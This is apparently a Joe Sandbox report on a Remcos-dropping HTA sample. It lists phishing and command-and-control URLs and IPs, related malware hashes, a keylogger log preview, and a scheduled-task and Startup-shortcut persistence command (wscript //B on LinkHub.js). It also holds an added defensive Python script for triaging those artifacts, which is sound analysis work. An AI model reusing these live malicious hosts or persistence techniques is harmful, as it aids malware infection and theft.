http://nsis.sf.net/NSIS_ErrorError | false | (none) | high | msword.exe, 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp, msword.exe, 00000010.00000000.2027567502.0000000000408000.00000002.00000001.01000000.0000000D.sdmp, msword.exe.13.dr
https://myguyapp.com/W2.pdfG | false | Avira URL Cloud: phishing | unknown | tasklist.exe, 00000013.00000003.2065519734.000000000321A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2068918634.000000000321A000.00000004.00000020.00020000.00000000.sdmp
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAMINGP | false | Avira URL Cloud: phishing | unknown | cmd.exe, 00000021.00000002.2095752286.00000000032C0000.00000004.00000020.00020000.00000000.sdmp
https://www.autoitscript.com/autoit3/ | false | (none) | high | Propose.com, 0000001C.00000003.2336994406.0000000000509000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2088771240.00000000038CA000.00000004.00000800.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr
https://github.com/Pester/Pester | false | (none) | high | powershell.exe, 00000002.00000002.1693219999.0000000004D86000.00000004.00000800.00020000.00000000.sdmp
https://candwfarmsllc.com | true | Avira URL Cloud: safe | unknown | powershell.exe, 00000002.00000002.1693219999.0000000004E55000.00000004.00000800.00020000.00000000.sdmp
https://myguyapp.com/W2.p | true | Avira URL Cloud: phishing | unknown | cmd.exe, 00000004.00000002.2028777650.000000000348E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.2007892523.0000000003472000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.2008095310.000000000348C000.00000004.00000020.00020000.00000000.sdmp
https://myguyapp.com/W2.pdfsD | false | Avira URL Cloud: phishing | unknown | cmd.exe, 0000001E.00000002.2092302096.0000000002B3A000.00000004.00000020.00020000.00000000.sdmp
https://aka.ms/pscore6lBdq | false | (none) | high | powershell.exe, 00000002.00000002.1693219999.0000000004C31000.00000004.00000800.00020000.00000000.sdmp
http://candwfarmsllc.com | false | Avira URL Cloud: safe | unknown | powershell.exe, 00000002.00000002.1693219999.0000000004FC2000.00000004.00000800.00020000.00000000.sdmp
https://contoso.com/ | false | (none) | high | powershell.exe, 00000002.00000002.1695865250.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp
https://nuget.org/nuget.exe | false | (none) | high | powershell.exe, 00000002.00000002.1695865250.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp
https://myguyapp.com/msword.zipur | false | Avira URL Cloud: phishing | unknown | tasklist.exe, 00000015.00000003.2072466480.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2072688924.0000000002D3C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2072595675.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2073717534.0000000002D3D000.00000004.00000020.00020000.00000000.sdmp
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | false | (none) | high | powershell.exe, 00000002.00000002.1693219999.0000000004C31000.00000004.00000800.00020000.00000000.sdmp
https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERD | false | Avira URL Cloud: phishing | unknown | tasklist.exe, 00000015.00000002.2073447449.0000000002C00000.00000004.00000020.00020000.00000000.sdmp
https://myguyapp.com/msword.zipbN | false | Avira URL Cloud: phishing | unknown | cmd.exe, 00000021.00000002.2096003879.0000000003410000.00000004.00000020.00020000.00000000.sdmp
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
193.26.115.39 | candwfarmsllc.com | Netherlands | 46261 | QUICKPACKETUS | false
                                                  Joe Sandbox version:42.0.0 Malachite
                                                  Analysis ID:1589232
                                                  Start date and time:2025-01-11 22:52:06 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 10m 5s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:40
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:c2.hta
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.expl.evad.winHTA@70/98@8/2
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:
                                                  • Successful, ratio: 98%
                                                  • Number of executed functions: 91
                                                  • Number of non-executed functions: 298
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .hta
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 2.16.168.105, 2.16.168.107, 184.28.88.176, 162.159.61.3, 172.64.41.3, 3.219.243.226, 52.6.155.20, 52.22.41.97, 3.233.129.217, 23.209.209.135, 2.16.164.72, 2.16.164.97, 2.16.164.67, 2.19.11.117, 2.19.11.122, 184.28.90.27, 18.213.11.84, 20.109.210.53, 23.217.172.185, 4.175.87.197, 13.107.246.45
                                                  • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, a767.dspw65.akamai.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
• Not all processes were analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
16:52:57 | API Interceptor | 1x Sleep call for process: mshta.exe modified
16:52:57 | API Interceptor | 95x Sleep call for process: powershell.exe modified
16:53:12 | API Interceptor | 2x Sleep call for process: AcroCEF.exe modified
16:53:35 | API Interceptor | 1x Sleep call for process: msword.exe modified
16:54:38 | API Interceptor | 70x Sleep call for process: Propose.com modified
21:53:40 | Task Scheduler | Run new task: Murray path: wscript s>//B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
21:53:42 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url
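The last two timeline entries are the sample's persistence: a scheduled task whose action is wscript //B on a .js file under AppData, and an Internet shortcut placed in the Startup folder. On a live host the first is recovered with schtasks /query /xml /tn Murray and the second by reading the .url file, and both need parsing before they can be judged. The following is an added example, not Joe Sandbox code, showing that triage: it parses a Task Scheduler XML export and an InternetShortcut file, resolves the launched target, and reports why each is suspicious. Both artifacts are constructed stand-ins (the report reproduces neither), so the logon trigger, the .url body, and every value except the task action are assumptions.

```python
"""Triage of the two persistence artifacts in the timeline above: the scheduled task
"Murray" and the Startup-folder LinkHub.url. Added example for this page, not Joe
Sandbox code. TASK_XML stands in for 'schtasks /query /xml /tn Murray' output and
URL_FILE for the .url contents; the trigger and the .url body are assumptions."""
import configparser
import ntpath
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
SCRIPT_EXT = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".bat", ".cmd", ".ps1")
USER_DIRS = ("\\appdata\\", "\\temp\\", "\\users\\public\\")

# Constructed: Task Scheduler export of the task the timeline records (logon trigger assumed).
TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>wscript</Command>
      <Arguments>//B "C:\\Users\\user\\AppData\\Local\\ConnectWare Technologies Ltd\\LinkHub.js"</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed: an Internet-shortcut body that launches the same script from the Startup folder.
URL_FILE = """[InternetShortcut]
URL=file:///C:/Users/user/AppData/Local/ConnectWare Technologies Ltd/LinkHub.js
IconIndex=0
"""


def _exe_name(cmd: str) -> str:
    base = ntpath.basename(cmd.strip('"')).lower()
    return base if ntpath.splitext(base)[1] else base + ".exe"   # "wscript" -> "wscript.exe"


def _in_user_dir(p: str) -> bool:
    return any(d in p.lower() for d in USER_DIRS)


def _first_path(args: str) -> str:
    m = re.search(r'"([^"]+)"', args)            # first quoted token, else first bare token
    return m.group(1) if m else (args.split()[0] if args.split() else "")


def task_action(task_xml: str):
    """Command and argument string of the task's Exec action (namespace-aware)."""
    ex = ET.fromstring(task_xml).find("t:Actions/t:Exec", TASK_NS)
    if ex is None:
        return "", ""
    return (ex.findtext("t:Command", default="", namespaces=TASK_NS).strip(),
            ex.findtext("t:Arguments", default="", namespaces=TASK_NS).strip())


def assess_task(task_xml: str) -> dict:
    cmd, args = task_action(task_xml)
    host, target, reasons = _exe_name(cmd), _first_path(args), []
    if host in SCRIPT_HOSTS:
        reasons.append(f"action runs a script host ({host})")
    if re.search(r"(?:^|\s)//?[Bb](?:\s|$)", args):
        reasons.append("batch mode (//B) hides script errors and prompts")
    if target and _in_user_dir(target):
        reasons.append("target lives in a user-writable directory")
    if target.lower().endswith(SCRIPT_EXT):
        reasons.append("target is a script, not a binary or document")
    return {"host": host, "target": target, "reasons": reasons, "suspicious": bool(reasons)}


def assess_url(text: str) -> dict:
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.read_string(text)
    url = cp.get("InternetShortcut", "URL", fallback="").strip()
    target = url[len("file:///"):].replace("/", "\\") if url.lower().startswith("file:///") else url
    reasons = []
    if target.lower().endswith(SCRIPT_EXT):
        reasons.append("Startup shortcut launches a script")
    if _in_user_dir(target):
        reasons.append("target lives in a user-writable directory")
    return {"target": target, "reasons": reasons, "suspicious": bool(reasons)}


if __name__ == "__main__":
    for label, finding in (("task Murray", assess_task(TASK_XML)), ("LinkHub.url", assess_url(URL_FILE))):
        print(label, "->", finding["target"])
        for r in finding["reasons"]:
            print("   ", r)
```

Both artifacts resolve to the same LinkHub.js, which is the pivot for cleanup: removing only the task leaves the Startup shortcut, and either one re-launches the AutoIt-built LinkHub.com that carries the Remcos payload.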
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  178.237.33.50c2.htaGet hashmaliciousRemcosBrowse
                                                  • geoplugin.net/json.gp
                                                  I1ahLI8fId.exeGet hashmaliciousRemcosBrowse
                                                  • geoplugin.net/json.gp
                                                  yPIOW6yoPi.exeGet hashmaliciousRemcosBrowse
                                                  • geoplugin.net/json.gp
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
 | bwYw3UUfy7.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
 | 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
 | Material Requirments.pif.exe | Get hash | malicious | Remcos, PureLog Stealer | Browse | geoplugin.net/json.gp
 | preliminary drawing.pif.exe | Get hash | malicious | Remcos, PureLog Stealer | Browse | geoplugin.net/json.gp
 | DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
 | z58Swiftcopy_MT.bat.exe | Get hash | malicious | Remcos, GuLoader | Browse | geoplugin.net/json.gp
 | 173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
193.26.115.39 | c2.hta | Get hash | malicious | Remcos | Browse |
 | c2.hta | Get hash | malicious | Remcos | Browse |
 | c2.hta | Get hash | malicious | Remcos | Browse |
 | RailProvides_nopump.exe | Get hash | malicious | Remcos | Browse |
 | c2.hta | Get hash | malicious | Remcos | Browse |
 | 9W9jJCj9EV.bat | Get hash | malicious | Remcos | Browse |
 | c2.hta | Get hash | malicious | Remcos | Browse |
 | c2.hta | Get hash | malicious | Remcos | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
me-work.com | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
 | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
 | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
 | RailProvides_nopump.exe | Get hash | malicious | Remcos | Browse | 193.26.115.39
 | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
 | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
 | c2.hta | Get hash | malicious | XWorm | Browse | 193.26.115.21
 | c2.hta | Get hash | malicious | XWorm | Browse | 193.26.115.21
 | c2.hta | Get hash | malicious | XWorm | Browse | 193.26.115.21
 | c2.hta | Get hash | malicious | XWorm | Browse | 87.120.117.152
candwfarmsllc.com | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
 | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
myguyapp.com | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
 | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
 | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
 | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
 | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
 | c2.hta | Get hash | malicious | XWorm | Browse | 193.26.115.21
 | c2.hta | Get hash | malicious | XWorm | Browse | 193.26.115.21
 | c2.hta | Get hash | malicious | XWorm | Browse | 193.26.115.21
 | EeSNugjFh5.bat | Get hash | malicious | Unknown | Browse | 193.26.115.21
 | c2.hta | Get hash | malicious | XWorm | Browse | 193.26.115.21
geoplugin.net | c2.hta | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | I1ahLI8fId.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | yPIOW6yoPi.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | bwYw3UUfy7.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | Material Requirments.pif.exe | Get hash | malicious | Remcos, PureLog Stealer | Browse | 178.237.33.50
 | preliminary drawing.pif.exe | Get hash | malicious | Remcos, PureLog Stealer | Browse | 178.237.33.50
 | DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | z58Swiftcopy_MT.bat.exe | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
 | 173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ATOM86-ASATOM86NL | c2.hta | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | I1ahLI8fId.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | yPIOW6yoPi.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | bwYw3UUfy7.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | Material Requirments.pif.exe | Get hash | malicious | Remcos, PureLog Stealer | Browse | 178.237.33.50
 | preliminary drawing.pif.exe | Get hash | malicious | Remcos, PureLog Stealer | Browse | 178.237.33.50
 | DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
 | z58Swiftcopy_MT.bat.exe | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
 | 173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
QUICKPACKETUS | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
 | RFQ-20241230.pif.exe | Get hash | malicious | Remcos | Browse | 173.211.106.233
 | Suppliers_Data.pif.exe | Get hash | malicious | Remcos | Browse | 173.211.106.233
 | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
 | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
 | RailProvides_nopump.exe | Get hash | malicious | Remcos | Browse | 193.26.115.39
 | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
 | https://z97f4f2525fyg27.webflow.io/ | Get hash | malicious | HTMLPhisher | Browse | 172.82.129.154
 | 9W9jJCj9EV.bat | Get hash | malicious | Remcos | Browse | 193.26.115.39
 | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | uPVRnocVS.exe | Get hash | malicious | DCRat | Browse | 193.26.115.39
 | Udzp7lL5ns.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 193.26.115.39
 | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
 | nfKqna8HuC.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 193.26.115.39
 | kAsh3nmsgs.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 193.26.115.39
 | mnXS9meqtB.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 193.26.115.39
 | Exodus.txt.lnk | Get hash | malicious | StormKitty | Browse | 193.26.115.39
 | dhPWt112uC.exe | Get hash | malicious | AgentTesla | Browse | 193.26.115.39
 | h8izmpp1ZM.exe | Get hash | malicious | MassLogger RAT | Browse | 193.26.115.39
 | x8M2g1Xxhz.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 193.26.115.39
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | c2.hta | Get hash | malicious | Remcos | Browse |
 | Setup.exe | Get hash | malicious | LummaC | Browse |
 | Setup.exe | Get hash | malicious | LummaC | Browse |
 | Setup.exe | Get hash | malicious | LummaC | Browse |
 | Full-Ver_Setup.exe | Get hash | malicious | LummaC Stealer | Browse |
 | random.exe | Get hash | malicious | LummaC Stealer | Browse |
 | HouseholdsClicking.exe | Get hash | malicious | LummaC | Browse |
 | DodSussex.exe | Get hash | malicious | LummaC Stealer | Browse |
 | DangerousMidlands.exe | Get hash | malicious | LummaC Stealer | Browse |
 | PortugalForum_nopump.exe | Get hash | malicious | Unknown | Browse |
Process: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
File Type: data
Category: dropped
Size (bytes): 144
Entropy (8bit): 3.365630494294252
Encrypted: false
SSDEEP: 3:rglsPlqlNaVrCl55JWRal2Jl+7R0DAlBG45klovDl6v:MlsPleNa0l55YcIeeDAlOWAv
MD5: 45B27503AD0103128F9F7B21285BCF2E
SHA1: F01B610CC5506BF62E439CB0F930FE5F94378B7E
SHA-256: 4359FE5974245097D319928CA60D57F534C444D4A16FD99FA79EA2D6CB9B303A
SHA-512: F9ADB8EEE56F8D8DB646D487638AF3ECF42396C42B1E85FF00531B8232DD88923C2A4516694042C8AEE408C5B5A8E019DAF74BB9DFB25036DC4E99C7D27108C3
Malicious: true
Preview: ....[.2.0.2.5./.0.1./.1.1. .1.6.:.5.4.:.0.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: ASCII text
Category: dropped
Size (bytes): 292
Entropy (8bit): 5.200347384526533
Encrypted: false
SSDEEP: 6:iOZeZnQyq2Pwkn2nKuAl9OmbnIFUtDecG1ZmwVecQRkwOwkn2nKuAl9OmbjLJ:74ZQyvYfHAahFUtScg/McQR5JfHAaSJ
MD5: CC5B1B2873A60E94030DCDF0C5741EC4
SHA1: EEA597788DFD352C60080EB97F950E5320E05632
SHA-256: BB744BC4816ADA64FAA853AFB8A48E347F4550D36FB13B942D68CE99C01E9B26
SHA-512: F76C2D6F7839127E87E9F38FA61D7309009FB0B2BB50AE8ADAB3C01BF5A000170034CBCC2D1D9A2B8A2617ACD9DEC89388E975A179766A6AF9F299D4D2B3BECC
Malicious: false
Preview: 2025/01/11-16:53:03.991 1f90 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/11-16:53:03.994 1f90 Recovering log #3.2025/01/11-16:53:03.994 1f90 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: ASCII text
Category: dropped
Size (bytes): 292
Entropy (8bit): 5.200347384526533
Encrypted: false
SSDEEP: 6:iOZeZnQyq2Pwkn2nKuAl9OmbnIFUtDecG1ZmwVecQRkwOwkn2nKuAl9OmbjLJ:74ZQyvYfHAahFUtScg/McQR5JfHAaSJ
MD5: CC5B1B2873A60E94030DCDF0C5741EC4
SHA1: EEA597788DFD352C60080EB97F950E5320E05632
SHA-256: BB744BC4816ADA64FAA853AFB8A48E347F4550D36FB13B942D68CE99C01E9B26
SHA-512: F76C2D6F7839127E87E9F38FA61D7309009FB0B2BB50AE8ADAB3C01BF5A000170034CBCC2D1D9A2B8A2617ACD9DEC89388E975A179766A6AF9F299D4D2B3BECC
Malicious: false
Preview: 2025/01/11-16:53:03.991 1f90 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/11-16:53:03.994 1f90 Recovering log #3.2025/01/11-16:53:03.994 1f90 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: ASCII text
Category: dropped
Size (bytes): 333
Entropy (8bit): 5.164399112142111
Encrypted: false
SSDEEP: 6:iOZnQv39+q2Pwkn2nKuAl9Ombzo2jMGIFUtDnQHZmwVnQnVkwOwkn2nKuAl9OmbX:7e34vYfHAa8uFUta/45JfHAa8RJ
MD5: 68FD737ED618E93B0B71FB7167BF8590
SHA1: 173C3FFF805FF78625F1072265F0A3282C0C44B5
SHA-256: 4BF4713F5C12B7593280DF666B984D6AF6ED8CF537AFC51DE6EE6EB1E52A5B74
SHA-512: 326813228B6ADE71724B49D597F954EB45CA4716A2DCA062BEFDB34BB9B0E99000CFB5780F55E65CA7DCB37127EEF99171FAA008806B5760EC9C6144969836BE
Malicious: false
Preview: 2025/01/11-16:53:04.052 ea8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/11-16:53:04.054 ea8 Recovering log #3.2025/01/11-16:53:04.054 ea8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: ASCII text
Category: dropped
Size (bytes): 333
Entropy (8bit): 5.164399112142111
Encrypted: false
SSDEEP: 6:iOZnQv39+q2Pwkn2nKuAl9Ombzo2jMGIFUtDnQHZmwVnQnVkwOwkn2nKuAl9OmbX:7e34vYfHAa8uFUta/45JfHAa8RJ
MD5: 68FD737ED618E93B0B71FB7167BF8590
SHA1: 173C3FFF805FF78625F1072265F0A3282C0C44B5
SHA-256: 4BF4713F5C12B7593280DF666B984D6AF6ED8CF537AFC51DE6EE6EB1E52A5B74
SHA-512: 326813228B6ADE71724B49D597F954EB45CA4716A2DCA062BEFDB34BB9B0E99000CFB5780F55E65CA7DCB37127EEF99171FAA008806B5760EC9C6144969836BE
Malicious: false
Preview: 2025/01/11-16:53:04.052 ea8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/11-16:53:04.054 ea8 Recovering log #3.2025/01/11-16:53:04.054 ea8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: JSON data
Category: dropped
Size (bytes): 475
Entropy (8bit): 4.9655162853550765
Encrypted: false
SSDEEP: 12:YH/um3RA8sqjGXYxsBdOg2H6caq3QYiubInP7E4T3y:Y2sRdstXYidMH13QYhbG7nby
MD5: EC95B54E0D5F9061BB0F405C2483A447
SHA1: 1458865A8601FF91B71359B7ECF3B8158EFA5FBB
SHA-256: 902AD4F93324EB3DD68DC2AF0291E966DBE4907337C2ACC5C5E2C6CB7C738B90
SHA-512: 70A740C8A54697E72EBB686D94133863FA1F8A291854A5EBF4CE54DC0402A4EB77862F0472AE188E363FFCFAE71C8A2F0095DBE5D75CE746FAE4EC8A39685C6E
Malicious: false
Preview: {"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381192395772480","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":131885},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: JSON data
Category: modified
Size (bytes): 475
Entropy (8bit): 4.9655162853550765
Encrypted: false
SSDEEP: 12:YH/um3RA8sqjGXYxsBdOg2H6caq3QYiubInP7E4T3y:Y2sRdstXYidMH13QYhbG7nby
MD5: EC95B54E0D5F9061BB0F405C2483A447
SHA1: 1458865A8601FF91B71359B7ECF3B8158EFA5FBB
SHA-256: 902AD4F93324EB3DD68DC2AF0291E966DBE4907337C2ACC5C5E2C6CB7C738B90
SHA-512: 70A740C8A54697E72EBB686D94133863FA1F8A291854A5EBF4CE54DC0402A4EB77862F0472AE188E363FFCFAE71C8A2F0095DBE5D75CE746FAE4EC8A39685C6E
Malicious: false
Preview: {"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381192395772480","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":131885},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type: data
Category: dropped
Size (bytes): 4320
Entropy (8bit): 5.25708361936938
Encrypted: false
SSDEEP: 96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7BFIY:etJCV4FiN/jTN/2r8Mta02fEhgO73gol
MD5: 04782DB1912329AA8ED5C65E8B4343B6
SHA1: EF805E3B6A1C0A2A7C7411345CA4BFE036754CE8
SHA-256: A2EC3C4CE6530D1F0989699CFDFDD1412848206E407943D1099D5EA0D38E8E24
SHA-512: D143C1074E388D0F9C363A2C8D61EAA56CD3645FB633C32F73A46C37061028A5DED1C11C6B1A9698415EA3A9AC7AB486A734A1EDFE4C37395A60F93A4590E149
Malicious: false
